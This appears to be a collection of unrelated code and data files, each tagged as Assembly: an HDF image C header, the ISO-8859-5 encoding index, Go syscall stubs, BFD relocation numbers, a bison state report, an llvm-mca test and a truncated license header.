* Each is given a width and height. They point to an NT tag to
* indicate how big a channel (red, green, etc) for a pixel is. They
* tell how many channels it takes to make a pixel (3 for RGB) and
* what storage interleave scheme is used for the image. They also point
* to a compression tag to describe the compression scheme.
*
* imHdfDim holds all this information after being read in, or before
* being written out.
*/
typedef struct imHdfDim
{
int dim_width; /* Image width */
int dim_height; /* Image height */
int dim_channelType; /* Type used for channel data */
int dim_channelSize; /* # of bytes per channel */
int dim_channelByteOrder; /* Channel byte order */
int dim_channelFloatFormat; /* Channel float format */
int dim_pixelSize; /* # of channels per pixel */
int dim_interleave; /* Interleave scheme */
int dim_compression; /* Compression scheme */
} imHdfDim;
/*
* TYPEDEF & STRUCT
* imHdfRIG - RIG information collection
*
* DESCRIPTION
* A RIG (raster image group) references several other tags. Much of
* the information these tags point to must be read in and available
* before the image, CLT, and matte image themselves can be read in
* and uncompressed. imHdfRIG is a repository for this collection of
* information prior to the image being read in.
*/
typedef struct imHdfRIG
{
imHdfDD *rig_dd; /* RIG data descriptor */
/* Image Dimension (ID) info */
imHdfDim *rig_imageDim; /* Image dimension info */
/* Raster Image (RI) info */
imHdfDD *rig_imageDD; /* DD pointing to image */
/* Lookup table Dimension (LD) info */
imHdfDim *rig_cltDim; /* CLT dimension info */
/* LookUp Table (LUT) info */
imHdfDD *rig_cltDD; /* DD pointing to CLT */
/* Matte channel Dimension (MD) info */
imHdfDim *rig_matteDim; /* Matte dimension info */
/* MAtte channel (MA) info */
imHdfDD *rig_matteDD; /* DD pointing to matte */
/* Color CorrectionN (CCN) info */
int rig_ccnGiven; /* Was an CCN tag supplied? */
float rig_gamma; /* Gamma correction factor */
float rig_red[3]; /* XYZ for red */
float rig_green[3]; /* XYZ for green */
float rig_blue[3]; /* XYZ for blue */
float rig_white[3]; /* XYZ for white */
/* Color ForMat (CFM) info */
int rig_colorFormat; /* Color format for image */
/* Aspect Ratio (AR) info */
float rig_aspectRatio; /* Image aspect ratio */
/* Machine Type Override (MTO) info */
struct imHdfRIG *rig_next; /* Next in RIG list */
} imHdfRIG;
/*
* FUNCTIONS
* imHdf* - private functions to imhdfread.c and imhdfwrite.c
*/
#ifdef __STDC__
extern void imHdfDDEmpty(void );
extern imHdfDD *imHdfDDAppend(unsigned int tag, unsigned int ref, long dataOffset, long dataLength );
extern imHdfDD *imHdfDDFind(unsigned int tag, unsigned int ref );
extern void imHdfCltEmpty( void );
extern imHdfClt *imHdfCltAppend( ImClt* clt, unsigned int refLUT, unsigned int refLD);
extern imHdfClt *imHdfCltFind( ImClt * clt );
extern imHdfClt *imHdfCltFindRef( unsigned int ref);
#else
extern void imHdfDDEmpty( );
extern imHdfDD *imHdfDDAppend( );
extern imHdfDD *imHdfDDFind( );
extern void imHdfCltEmpty( );
extern imHdfClt *imHdfCltAppend( );
extern imHdfClt *imHdfCltFind( );
extern imHdfClt *imHdfCltFindRef( );
#endif
#endif /* __IMHDFINTERNALH__ */
| {
"language": "Assembly"
} |
# For details on index index-iso-8859-5.txt see the Encoding Standard
# https://encoding.spec.whatwg.org/
#
# Identifier: fa9b1f3f5242df43e2e7bca80e9b6997c67944f20a4af91ee06bacc4e132d9c9
# Date: 2018-01-06
0 0x0080 (<control>)
1 0x0081 (<control>)
2 0x0082 (<control>)
3 0x0083 (<control>)
4 0x0084 (<control>)
5	0x0085	(<control>)
6 0x0086 (<control>)
7 0x0087 (<control>)
8 0x0088 (<control>)
9 0x0089 (<control>)
10 0x008A (<control>)
11 0x008B (<control>)
12 0x008C (<control>)
13 0x008D (<control>)
14 0x008E (<control>)
15 0x008F (<control>)
16 0x0090 (<control>)
17 0x0091 (<control>)
18 0x0092 (<control>)
19 0x0093 (<control>)
20 0x0094 (<control>)
21 0x0095 (<control>)
22 0x0096 (<control>)
23 0x0097 (<control>)
24 0x0098 (<control>)
25 0x0099 (<control>)
26 0x009A (<control>)
27 0x009B (<control>)
28 0x009C (<control>)
29 0x009D (<control>)
30 0x009E (<control>)
31 0x009F (<control>)
32 0x00A0 (NO-BREAK SPACE)
33 0x0401 Ё (CYRILLIC CAPITAL LETTER IO)
34 0x0402 Ђ (CYRILLIC CAPITAL LETTER DJE)
35 0x0403 Ѓ (CYRILLIC CAPITAL LETTER GJE)
36 0x0404 Є (CYRILLIC CAPITAL LETTER UKRAINIAN IE)
37 0x0405 Ѕ (CYRILLIC CAPITAL LETTER DZE)
38 0x0406 І (CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I)
39 0x0407 Ї (CYRILLIC CAPITAL LETTER YI)
40 0x0408 Ј (CYRILLIC CAPITAL LETTER JE)
41 0x0409 Љ (CYRILLIC CAPITAL LETTER LJE)
42 0x040A Њ (CYRILLIC CAPITAL LETTER NJE)
43 0x040B Ћ (CYRILLIC CAPITAL LETTER TSHE)
44 0x040C Ќ (CYRILLIC CAPITAL LETTER KJE)
45 0x00AD (SOFT HYPHEN)
46 0x040E Ў (CYRILLIC CAPITAL LETTER SHORT U)
47 0x040F Џ (CYRILLIC CAPITAL LETTER DZHE)
48 0x0410 А (CYRILLIC CAPITAL LETTER A)
49 0x0411 Б (CYRILLIC CAPITAL LETTER BE)
50 0x0412 В (CYRILLIC CAPITAL LETTER VE)
51 0x0413 Г (CYRILLIC CAPITAL LETTER GHE)
52 0x0414 Д (CYRILLIC CAPITAL LETTER DE)
53 0x0415 Е (CYRILLIC CAPITAL LETTER IE)
54 0x0416 Ж (CYRILLIC CAPITAL LETTER ZHE)
55 0x0417 З (CYRILLIC CAPITAL LETTER ZE)
56 0x0418 И (CYRILLIC CAPITAL LETTER I)
57 0x0419 Й (CYRILLIC CAPITAL LETTER SHORT I)
58 0x041A К (CYRILLIC CAPITAL LETTER KA)
59 0x041B Л (CYRILLIC CAPITAL LETTER EL)
60 0x041C М (CYRILLIC CAPITAL LETTER EM)
61 0x041D Н (CYRILLIC CAPITAL LETTER EN)
62 0x041E О (CYRILLIC CAPITAL LETTER O)
63 0x041F П (CYRILLIC CAPITAL LETTER PE)
64 0x0420 Р (CYRILLIC CAPITAL LETTER ER)
65 0x0421 С (CYRILLIC CAPITAL LETTER ES)
66 0x0422 Т (CYRILLIC CAPITAL LETTER TE)
67 0x0423 У (CYRILLIC CAPITAL LETTER U)
68 0x0424 Ф (CYRILLIC CAPITAL LETTER EF)
69 0x0425 Х (CYRILLIC CAPITAL LETTER HA)
70 0x0426 Ц (CYRILLIC CAPITAL LETTER TSE)
71 0x0427 Ч (CYRILLIC CAPITAL LETTER CHE)
72 0x0428 Ш (CYRILLIC CAPITAL LETTER SHA)
73 0x0429 Щ (CYRILLIC CAPITAL LETTER SHCHA)
74 0x042A Ъ (CYRILLIC CAPITAL LETTER HARD SIGN)
75 0x042B Ы (CYRILLIC CAPITAL LETTER YERU)
76 0x042C Ь (CYRILLIC CAPITAL LETTER SOFT SIGN)
77 0x042D Э (CYRILLIC CAPITAL LETTER E)
78 0x042E Ю (CYRILLIC CAPITAL LETTER YU)
79 0x042F Я (CYRILLIC CAPITAL LETTER YA)
80 0x0430 а (CYRILLIC SMALL LETTER A)
81 0x0431 б (CYRILLIC SMALL LETTER BE)
82 0x0432 в (CYRILLIC SMALL LETTER VE)
83 0x0433 г (CYRILLIC SMALL LETTER GHE)
84 0x0434 д (CYRILLIC SMALL LETTER DE)
85 0x0435 е (CYRILLIC SMALL LETTER IE)
86 0x0436 ж (CYRILLIC SMALL LETTER ZHE)
87 0x0437 з (CYRILLIC SMALL LETTER ZE)
88 0x0438 и (CYRILLIC SMALL LETTER I)
89 0x0439 й (CYRILLIC SMALL LETTER SHORT I)
90 0x043A к (CYRILLIC SMALL LETTER KA)
91 0x043B л (CYRILLIC SMALL LETTER EL)
92 0x043C м (CYRILLIC SMALL LETTER EM)
93 0x043D н (CYRILLIC SMALL LETTER EN)
94 0x043E о (CYRILLIC SMALL LETTER O)
95 0x043F п (CYRILLIC SMALL LETTER PE)
96 0x0440 р (CYRILLIC SMALL LETTER ER)
97 0x0441 с (CYRILLIC SMALL LETTER ES)
98 0x0442 т (CYRILLIC SMALL LETTER TE)
99 0x0443 у (CYRILLIC SMALL LETTER U)
100 0x0444 ф (CYRILLIC SMALL LETTER EF)
101 0x0445 х (CYRILLIC SMALL LETTER HA)
102 0x0446 ц (CYRILLIC SMALL LETTER TSE)
103 0x0447 ч (CYRILLIC SMALL LETTER CHE)
104 0x0448 ш (CYRILLIC SMALL LETTER SHA)
105 0x0449 щ (CYRILLIC SMALL LETTER SHCHA)
106 0x044A ъ (CYRILLIC SMALL LETTER HARD SIGN)
107 0x044B ы (CYRILLIC SMALL LETTER YERU)
108 0x044C ь (CYRILLIC SMALL LETTER SOFT SIGN)
109 0x044D э (CYRILLIC SMALL LETTER E)
110 0x044E ю (CYRILLIC SMALL LETTER YU)
111 0x044F я (CYRILLIC SMALL LETTER YA)
112 0x2116 № (NUMERO SIGN)
113 0x0451 ё (CYRILLIC SMALL LETTER IO)
114 0x0452 ђ (CYRILLIC SMALL LETTER DJE)
115 0x0453 ѓ (CYRILLIC SMALL LETTER GJE)
116 0x0454 є (CYRILLIC SMALL LETTER UKRAINIAN IE)
117 0x0455 ѕ (CYRILLIC SMALL LETTER DZE)
118 0x0456 і (CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I)
119 0x0457 ї (CYRILLIC SMALL LETTER YI)
120 0x0458 ј (CYRILLIC SMALL LETTER JE)
121 0x0459 љ (CYRILLIC SMALL LETTER LJE)
122 0x045A њ (CYRILLIC SMALL LETTER NJE)
123 0x045B ћ (CYRILLIC SMALL LETTER TSHE)
124 0x045C ќ (CYRILLIC SMALL LETTER KJE)
125 0x00A7 § (SECTION SIGN)
126 0x045E ў (CYRILLIC SMALL LETTER SHORT U)
127 0x045F џ (CYRILLIC SMALL LETTER DZHE)
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for ARM, FreeBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
// Each routine tail-calls (B = branch, no new frame) the corresponding
// implementation in package syscall, so the caller's argument/result
// frame is reused unchanged.
// $0-N means: no local frame, N bytes of arguments+results
// (N/4 uintptr words on 32-bit ARM).
TEXT ·Syscall(SB),NOSPLIT,$0-28
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
B syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
B syscall·Syscall9(SB)
// Raw variants: same frames; behavior differences (if any) live in
// package syscall's implementations, not here.
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
B syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
We have a list of plugins.
In any particular context, some plugins are enabled.
DetectorFactoryCollection:
Core plugin
Collection of plugins
Collection of DetectorFactories
Adjustment ranker
I18N
ResourceBundles
bugPatternMap
bugCodeMap
categoryDescriptionMap
Plugin
collection of DetectorFactory
bug patterns, codes, etc.
component plugins
bug ranker
enabled
plugin loader
CloudFactory
registeredClouds
| {
"language": "Assembly"
} |
/* Meta ELF support for BFD.
Copyright (C) 2013-2020 Free Software Foundation, Inc.
Contributed by Imagination Technologies Ltd.
This file is part of BFD, the Binary File Descriptor library.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street - Fifth Floor, Boston, MA 02110-1301, USA. */
#ifndef _ELF_METAG_H
#define _ELF_METAG_H
#include "elf/reloc-macros.h"
/* Relocation types. */
START_RELOC_NUMBERS (elf_metag_reloc_type)
RELOC_NUMBER (R_METAG_HIADDR16, 0)
RELOC_NUMBER (R_METAG_LOADDR16, 1)
RELOC_NUMBER (R_METAG_ADDR32, 2)
RELOC_NUMBER (R_METAG_NONE, 3)
RELOC_NUMBER (R_METAG_RELBRANCH, 4)
RELOC_NUMBER (R_METAG_GETSETOFF, 5)
/* Backward compatibility */
RELOC_NUMBER (R_METAG_REG32OP1, 6)
RELOC_NUMBER (R_METAG_REG32OP2, 7)
RELOC_NUMBER (R_METAG_REG32OP3, 8)
RELOC_NUMBER (R_METAG_REG16OP1, 9)
RELOC_NUMBER (R_METAG_REG16OP2, 10)
RELOC_NUMBER (R_METAG_REG16OP3, 11)
RELOC_NUMBER (R_METAG_REG32OP4, 12)
RELOC_NUMBER (R_METAG_HIOG, 13)
RELOC_NUMBER (R_METAG_LOOG, 14)
RELOC_NUMBER (R_METAG_REL8, 15)
RELOC_NUMBER (R_METAG_REL16, 16)
/* GNU */
RELOC_NUMBER (R_METAG_GNU_VTINHERIT,30)
RELOC_NUMBER (R_METAG_GNU_VTENTRY, 31)
/* PIC relocations */
RELOC_NUMBER (R_METAG_HI16_GOTOFF, 32)
RELOC_NUMBER (R_METAG_LO16_GOTOFF, 33)
RELOC_NUMBER (R_METAG_GETSET_GOTOFF,34)
RELOC_NUMBER (R_METAG_GETSET_GOT, 35)
RELOC_NUMBER (R_METAG_HI16_GOTPC, 36)
RELOC_NUMBER (R_METAG_LO16_GOTPC, 37)
RELOC_NUMBER (R_METAG_HI16_PLT, 38)
RELOC_NUMBER (R_METAG_LO16_PLT, 39)
RELOC_NUMBER (R_METAG_RELBRANCH_PLT,40)
RELOC_NUMBER (R_METAG_GOTOFF, 41)
RELOC_NUMBER (R_METAG_PLT, 42)
RELOC_NUMBER (R_METAG_COPY, 43)
RELOC_NUMBER (R_METAG_JMP_SLOT, 44)
RELOC_NUMBER (R_METAG_RELATIVE, 45)
RELOC_NUMBER (R_METAG_GLOB_DAT, 46)
/* TLS relocations */
RELOC_NUMBER (R_METAG_TLS_GD, 47)
RELOC_NUMBER (R_METAG_TLS_LDM, 48)
RELOC_NUMBER (R_METAG_TLS_LDO_HI16, 49)
RELOC_NUMBER (R_METAG_TLS_LDO_LO16, 50)
RELOC_NUMBER (R_METAG_TLS_LDO, 51)
RELOC_NUMBER (R_METAG_TLS_IE, 52)
RELOC_NUMBER (R_METAG_TLS_IENONPIC, 53)
RELOC_NUMBER (R_METAG_TLS_IENONPIC_HI16,54)
RELOC_NUMBER (R_METAG_TLS_IENONPIC_LO16,55)
RELOC_NUMBER (R_METAG_TLS_TPOFF, 56)
RELOC_NUMBER (R_METAG_TLS_DTPMOD, 57)
RELOC_NUMBER (R_METAG_TLS_DTPOFF, 58)
RELOC_NUMBER (R_METAG_TLS_LE, 59)
RELOC_NUMBER (R_METAG_TLS_LE_HI16, 60)
RELOC_NUMBER (R_METAG_TLS_LE_LO16, 61)
END_RELOC_NUMBERS (R_METAG_MAX)
#endif /* _ELF_METAG_H */
| {
"language": "Assembly"
} |
Terminals unused in grammar
rshifI
cbr
l
Rules useless in parser due to conflicts
2 p0: $@1 p
State 4 conflicts: 1 shift/reduce
Grammar
0 $accept: p0 add
1 $@1: /* empty */
2 p0: $@1 p
3 p: p i
4 | /* empty */
5 i: i_2_1
6 | i_1_1
7 | i_1_2
8 | i_0_1
9 | i_2_0
10 i_2_1: op r comma r to r
11 | op r comma constant to r
12 i_1_1: op r to r
13 | op constant to r
14 i_1_2: op r to r comma r
15 i_0_1: op r
16 i_2_0: op r comma r
17 op: add
18 | sub
19 | mult
20 | _div
21 | inv
22 | addI
23 | subI
24 | multI
25 | divI
26 | rdivI
27 | and
28 | andI
29 | or
30 | orI
31 | xor
32 | xorI
33 | lshift
34 | lshiftI
35 | rshift
36 | load
37 | loadAI
38 | loadA0
39 | cload
40 | cloadAI
41 | cloadA0
42 | store
43 | storeAI
44 | storeA0
45 | cstore
46 | cstoreAI
47 | cstoreA0
48 | i2i
49 | c2c
50 | c2i
51 | i2c
52 | cmp_LT
53 | cmp_LE
54 | cmp_EQ
55 | cmp_GE
56 | cmp_GT
57 | cmp_NE
58 | jump
59 | jumpI
60 | nop
61 | tbl
62 | loadI
63 | inc
64 | dec
Terminals, with rules where they appear
add (0) 0 17
sub (1) 18
mult (2) 19
_div (3) 20
inv (4) 21
addI (5) 22
subI (6) 23
multI (7) 24
divI (8) 25
rdivI (9) 26
and (10) 27
andI (11) 28
or (12) 29
orI (13) 30
xor (14) 31
xorI (15) 32
lshift (16) 33
rshift (17) 35
lshiftI (18) 34
rshifI (19)
load (20) 36
loadAI (21) 37
loadA0 (22) 38
loadI (23) 62
cload (24) 39
cloadAI (25) 40
cloadA0 (26) 41
store (27) 42
storeAI (28) 43
storeA0 (29) 44
cstore (30) 45
cstoreAI (31) 46
cstoreA0 (32) 47
i2i (33) 48
c2c (34) 49
c2i (35) 50
i2c (36) 51
cmp_LT (37) 52
cmp_LE (38) 53
cmp_EQ (39) 54
cmp_GE (40) 55
cmp_GT (41) 56
cmp_NE (42) 57
cbr (43)
jump (44) 58
jumpI (45) 59
nop (46) 60
tbl (47) 61
inc (48) 63
dec (49) 64
r (100) 10 11 12 13 14 15 16
l (101)
constant (102) 11 13
comma (103) 10 11 14 16
to (104) 10 11 12 13 14
error (256)
Nonterminals, with rules where they appear
$accept (57)
on left: 0
p0 (58)
on left: 2, on right: 0
$@1 (59)
on left: 1, on right: 2
p (60)
on left: 3 4, on right: 2 3
i (61)
on left: 5 6 7 8 9, on right: 3
i_2_1 (62)
on left: 10 11, on right: 5
i_1_1 (63)
on left: 12 13, on right: 6
i_1_2 (64)
on left: 14, on right: 7
i_0_1 (65)
on left: 15, on right: 8
i_2_0 (66)
on left: 16, on right: 9
op (67)
on left: 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
56 57 58 59 60 61 62 63 64, on right: 10 11 12 13 14 15 16
state 0
0 $accept: . p0 add
$default reduce using rule 1 ($@1)
p0 go to state 1
$@1 go to state 2
state 1
0 $accept: p0 . add
add shift, and go to state 3
state 2
2 p0: $@1 . p
$default reduce using rule 4 (p)
p go to state 4
state 3
0 $accept: p0 add .
$default accept
state 4
2 p0: $@1 p .
3 p: p . i
add shift, and go to state 5
sub shift, and go to state 6
mult shift, and go to state 7
_div shift, and go to state 8
inv shift, and go to state 9
addI shift, and go to state 10
subI shift, and go to state 11
multI shift, and go to state 12
divI shift, and go to state 13
rdivI shift, and go to state 14
and shift, and go to state 15
andI shift, and go to state 16
or shift, and go to state 17
orI shift, and go to state 18
xor shift, and go to state 19
xorI shift, and go to state 20
lshift shift, and go to state 21
rshift shift, and go to state 22
lshiftI shift, and go to state 23
load shift, and go to state 24
loadAI shift, and go to state 25
loadA0 shift, and go to state 26
loadI shift, and go to state 27
cload shift, and go to state 28
cloadAI shift, and go to state 29
cloadA0 shift, and go to state 30
store shift, and go to state 31
storeAI shift, and go to state 32
storeA0 shift, and go to state 33
cstore shift, and go to state 34
cstoreAI shift, and go to state 35
cstoreA0 shift, and go to state 36
i2i shift, and go to state 37
c2c shift, and go to state 38
c2i shift, and go to state 39
i2c shift, and go to state 40
cmp_LT shift, and go to state 41
cmp_LE shift, and go to state 42
cmp_EQ shift, and go to state 43
cmp_GE shift, and go to state 44
cmp_GT shift, and go to state 45
cmp_NE shift, and go to state 46
jump shift, and go to state 47
jumpI shift, and go to state 48
nop shift, and go to state 49
tbl shift, and go to state 50
inc shift, and go to state 51
dec shift, and go to state 52
add [reduce using rule 2 (p0)]
i go to state 53
i_2_1 go to state 54
i_1_1 go to state 55
i_1_2 go to state 56
i_0_1 go to state 57
i_2_0 go to state 58
op go to state 59
state 5
17 op: add .
$default reduce using rule 17 (op)
state 6
18 op: sub .
$default reduce using rule 18 (op)
state 7
19 op: mult .
$default reduce using rule 19 (op)
state 8
20 op: _div .
$default reduce using rule 20 (op)
state 9
21 op: inv .
$default reduce using rule 21 (op)
state 10
22 op: addI .
$default reduce using rule 22 (op)
state 11
23 op: subI .
$default reduce using rule 23 (op)
state 12
24 op: multI .
$default reduce using rule 24 (op)
state 13
25 op: divI .
$default reduce using rule 25 (op)
state 14
26 op: rdivI .
$default reduce using rule 26 (op)
state 15
27 op: and .
$default reduce using rule 27 (op)
state 16
28 op: andI .
$default reduce using rule 28 (op)
state 17
29 op: or .
$default reduce using rule 29 (op)
state 18
30 op: orI .
$default reduce using rule 30 (op)
state 19
31 op: xor .
$default reduce using rule 31 (op)
state 20
32 op: xorI .
$default reduce using rule 32 (op)
state 21
33 op: lshift .
$default reduce using rule 33 (op)
state 22
35 op: rshift .
$default reduce using rule 35 (op)
state 23
34 op: lshiftI .
$default reduce using rule 34 (op)
state 24
36 op: load .
$default reduce using rule 36 (op)
state 25
37 op: loadAI .
$default reduce using rule 37 (op)
state 26
38 op: loadA0 .
$default reduce using rule 38 (op)
state 27
62 op: loadI .
$default reduce using rule 62 (op)
state 28
39 op: cload .
$default reduce using rule 39 (op)
state 29
40 op: cloadAI .
$default reduce using rule 40 (op)
state 30
41 op: cloadA0 .
$default reduce using rule 41 (op)
state 31
42 op: store .
$default reduce using rule 42 (op)
state 32
43 op: storeAI .
$default reduce using rule 43 (op)
state 33
44 op: storeA0 .
$default reduce using rule 44 (op)
state 34
45 op: cstore .
$default reduce using rule 45 (op)
state 35
46 op: cstoreAI .
$default reduce using rule 46 (op)
state 36
47 op: cstoreA0 .
$default reduce using rule 47 (op)
state 37
48 op: i2i .
$default reduce using rule 48 (op)
state 38
49 op: c2c .
$default reduce using rule 49 (op)
state 39
50 op: c2i .
$default reduce using rule 50 (op)
state 40
51 op: i2c .
$default reduce using rule 51 (op)
state 41
52 op: cmp_LT .
$default reduce using rule 52 (op)
state 42
53 op: cmp_LE .
$default reduce using rule 53 (op)
state 43
54 op: cmp_EQ .
$default reduce using rule 54 (op)
state 44
55 op: cmp_GE .
$default reduce using rule 55 (op)
state 45
56 op: cmp_GT .
$default reduce using rule 56 (op)
state 46
57 op: cmp_NE .
$default reduce using rule 57 (op)
state 47
58 op: jump .
$default reduce using rule 58 (op)
state 48
59 op: jumpI .
$default reduce using rule 59 (op)
state 49
60 op: nop .
$default reduce using rule 60 (op)
state 50
61 op: tbl .
$default reduce using rule 61 (op)
state 51
63 op: inc .
$default reduce using rule 63 (op)
state 52
64 op: dec .
$default reduce using rule 64 (op)
state 53
3 p: p i .
$default reduce using rule 3 (p)
state 54
5 i: i_2_1 .
$default reduce using rule 5 (i)
state 55
6 i: i_1_1 .
$default reduce using rule 6 (i)
state 56
7 i: i_1_2 .
$default reduce using rule 7 (i)
state 57
8 i: i_0_1 .
$default reduce using rule 8 (i)
state 58
9 i: i_2_0 .
$default reduce using rule 9 (i)
state 59
10 i_2_1: op . r comma r to r
11 | op . r comma constant to r
12 i_1_1: op . r to r
13 | op . constant to r
14 i_1_2: op . r to r comma r
15 i_0_1: op . r
16 i_2_0: op . r comma r
r shift, and go to state 60
constant shift, and go to state 61
state 60
10 i_2_1: op r . comma r to r
11 | op r . comma constant to r
12 i_1_1: op r . to r
14 i_1_2: op r . to r comma r
15 i_0_1: op r .
16 i_2_0: op r . comma r
comma shift, and go to state 62
to shift, and go to state 63
$default reduce using rule 15 (i_0_1)
state 61
13 i_1_1: op constant . to r
to shift, and go to state 64
state 62
10 i_2_1: op r comma . r to r
11 | op r comma . constant to r
16 i_2_0: op r comma . r
r shift, and go to state 65
constant shift, and go to state 66
state 63
12 i_1_1: op r to . r
14 i_1_2: op r to . r comma r
r shift, and go to state 67
state 64
13 i_1_1: op constant to . r
r shift, and go to state 68
state 65
10 i_2_1: op r comma r . to r
16 i_2_0: op r comma r .
to shift, and go to state 69
$default reduce using rule 16 (i_2_0)
state 66
11 i_2_1: op r comma constant . to r
to shift, and go to state 70
state 67
12 i_1_1: op r to r .
14 i_1_2: op r to r . comma r
comma shift, and go to state 71
$default reduce using rule 12 (i_1_1)
state 68
13 i_1_1: op constant to r .
$default reduce using rule 13 (i_1_1)
state 69
10 i_2_1: op r comma r to . r
r shift, and go to state 72
state 70
11 i_2_1: op r comma constant to . r
r shift, and go to state 73
state 71
14 i_1_2: op r to r comma . r
r shift, and go to state 74
state 72
10 i_2_1: op r comma r to r .
$default reduce using rule 10 (i_2_1)
state 73
11 i_2_1: op r comma constant to r .
$default reduce using rule 11 (i_2_1)
state 74
14 i_1_2: op r to r comma r .
$default reduce using rule 14 (i_1_2)
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -mtriple=x86_64-unknown-unknown -mcpu=bdver2 -iterations=1500 -timeline -timeline-max-iterations=3 < %s | FileCheck %s
# perf stat reports a throughput of 0.60 IPC for this code snippet.
# The lzcnt cannot execute in parallel with the imul because there is a false
# dependency on %bx.
imul %ax, %bx
lzcnt %ax, %bx
add %cx, %bx
# CHECK: Iterations: 1500
# CHECK-NEXT: Instructions: 4500
# CHECK-NEXT: Total Cycles: 9753
# CHECK-NEXT: Total uOps: 6000
# CHECK: Dispatch Width: 4
# CHECK-NEXT: uOps Per Cycle: 0.62
# CHECK-NEXT: IPC: 0.46
# CHECK-NEXT: Block RThroughput: 2.0
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 1 4 2.00 imulw %ax, %bx
# CHECK-NEXT: 2 2 2.00 lzcntw %ax, %bx
# CHECK-NEXT: 1 1 1.00 addw %cx, %bx
# CHECK: Resources:
# CHECK-NEXT: [0.0] - PdAGLU01
# CHECK-NEXT: [0.1] - PdAGLU01
# CHECK-NEXT: [1] - PdBranch
# CHECK-NEXT: [2] - PdCount
# CHECK-NEXT: [3] - PdDiv
# CHECK-NEXT: [4] - PdEX0
# CHECK-NEXT: [5] - PdEX1
# CHECK-NEXT: [6] - PdFPCVT
# CHECK-NEXT: [7.0] - PdFPFMA
# CHECK-NEXT: [7.1] - PdFPFMA
# CHECK-NEXT: [8.0] - PdFPMAL
# CHECK-NEXT: [8.1] - PdFPMAL
# CHECK-NEXT: [9] - PdFPMMA
# CHECK-NEXT: [10] - PdFPSTO
# CHECK-NEXT: [11] - PdFPU0
# CHECK-NEXT: [12] - PdFPU1
# CHECK-NEXT: [13] - PdFPU2
# CHECK-NEXT: [14] - PdFPU3
# CHECK-NEXT: [15] - PdFPXBR
# CHECK-NEXT: [16.0] - PdLoad
# CHECK-NEXT: [16.1] - PdLoad
# CHECK-NEXT: [17] - PdMul
# CHECK-NEXT: [18] - PdStore
# CHECK: Resource pressure per iteration:
# CHECK-NEXT: [0.0] [0.1] [1] [2] [3] [4] [5] [6] [7.0] [7.1] [8.0] [8.1] [9] [10] [11] [12] [13] [14] [15] [16.0] [16.1] [17] [18]
# CHECK-NEXT: - - - - - 3.00 2.00 - - - - - - - - - - - - - - 2.00 -
# CHECK: Resource pressure by instruction:
# CHECK-NEXT: [0.0] [0.1] [1] [2] [3] [4] [5] [6] [7.0] [7.1] [8.0] [8.1] [9] [10] [11] [12] [13] [14] [15] [16.0] [16.1] [17] [18] Instructions:
# CHECK-NEXT: - - - - - - 1.00 - - - - - - - - - - - - - - 2.00 - imulw %ax, %bx
# CHECK-NEXT: - - - - - 2.00 - - - - - - - - - - - - - - - - - lzcntw %ax, %bx
# CHECK-NEXT: - - - - - 1.00 1.00 - - - - - - - - - - - - - - - - addw %cx, %bx
# CHECK: Timeline view:
# CHECK-NEXT: 0123456789
# CHECK-NEXT: Index 0123456789 01
# CHECK: [0,0] DeeeeER . . .. imulw %ax, %bx
# CHECK-NEXT: [0,1] D===eeER . . .. lzcntw %ax, %bx
# CHECK-NEXT: [0,2] D=====eER . . .. addw %cx, %bx
# CHECK-NEXT: [1,0] .D======eeeeER . .. imulw %ax, %bx
# CHECK-NEXT: [1,1] .D=========eeER. .. lzcntw %ax, %bx
# CHECK-NEXT: [1,2] .D===========eER .. addw %cx, %bx
# CHECK-NEXT: [2,0] . D===========eeeeER.. imulw %ax, %bx
# CHECK-NEXT: [2,1] . D==============eeER. lzcntw %ax, %bx
# CHECK-NEXT: [2,2] . D================eER addw %cx, %bx
# CHECK: Average Wait times (based on the timeline view):
# CHECK-NEXT: [0]: Executions
# CHECK-NEXT: [1]: Average time spent waiting in a scheduler's queue
# CHECK-NEXT: [2]: Average time spent waiting in a scheduler's queue while ready
# CHECK-NEXT: [3]: Average time elapsed from WB until retire stage
# CHECK: [0] [1] [2] [3]
# CHECK-NEXT: 0. 3 6.7 0.7 0.0 imulw %ax, %bx
# CHECK-NEXT: 1. 3 9.7 0.0 0.0 lzcntw %ax, %bx
# CHECK-NEXT: 2. 3 11.7 0.0 0.0 addw %cx, %bx
# CHECK-NEXT: 3 9.3 0.2 0.0 <total>
| {
"language": "Assembly"
} |
/*********************************************************************/
/* Copyright 2009, 2010 The University of Texas at Austin. */
/* All rights reserved. */
/* */
/* Redistribution and use in source and binary forms, with or */
/* without modification, are permitted provided that the following */
/* conditions are met: */
/* */
/* 1. Redistributions of source code must retain the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer. */
/* */
/* 2. Redistributions in binary form must reproduce the above */
/* copyright notice, this list of conditions and the following */
/* disclaimer in the documentation and/or other materials */
/* provided with the distribution. */
/* */
/* THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY OF TEXAS AT */
